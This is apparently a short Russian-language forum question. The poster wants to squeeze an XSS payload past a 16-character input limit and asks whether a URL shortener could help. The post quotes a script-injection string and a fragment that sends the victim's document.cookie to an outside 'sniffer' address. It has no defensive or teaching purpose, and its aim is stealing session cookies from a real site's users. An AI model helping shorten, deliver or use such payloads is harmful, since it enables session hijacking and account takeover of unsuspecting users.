Такой вопрос оч волнует - есть ограничение на ввод символов > 16 в XSS конструкции '><script>alert()</script>

Есть ли какой-то способ втиснуться? может сервисом сокращения воспользоваться?
Но тогда каким? И что сокращать: http://sniffer.gif?+document.cookie

это? помогите пожалуста... мозги спарились уже